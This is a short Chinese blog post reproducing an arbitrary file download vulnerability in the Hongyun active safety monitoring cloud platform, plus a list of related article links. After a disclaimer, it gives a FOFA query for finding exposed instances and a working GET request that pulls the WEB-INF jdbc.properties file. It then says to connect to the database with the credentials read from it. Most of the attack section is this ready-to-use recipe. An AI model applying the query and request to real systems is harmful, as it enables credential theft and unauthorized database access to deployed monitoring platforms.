漏洞复现--鸿运主动安全监控云平台任意文件下载

免责声明:

**文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行

**

一:漏洞描述

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

二:漏洞影响版本

鸿运主动安全监控云平台

三:网络空间测绘查询

fofa:
body="./open/webApi.html"

四:漏洞复现

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

五:漏洞利用

读取到数据库账号密码,直接连接

相关推荐
ac-er888816 分钟前
MySQL如何实现PHP输入安全
mysql·安全·php
jjyangyou3 小时前
物联网核心安全系列——物联网安全需求
物联网·算法·安全·嵌入式·产品经理·硬件·产品设计
AltmanChan4 小时前
大语言模型安全威胁
人工智能·安全·语言模型
马船长4 小时前
红帆OA iorepsavexml.aspx文件上传漏洞
安全
hikktn12 小时前
如何在 Rust 中实现内存安全:与 C/C++ 的对比分析
c语言·安全·rust
23zhgjx-NanKon13 小时前
华为eNSP:QinQ
网络·安全·华为
23zhgjx-NanKon13 小时前
华为eNSP:mux-vlan
网络·安全·华为
昔我往昔14 小时前
阿里云文本内容安全处理
安全·阿里云·云计算
Lionhacker14 小时前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
centos0816 小时前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf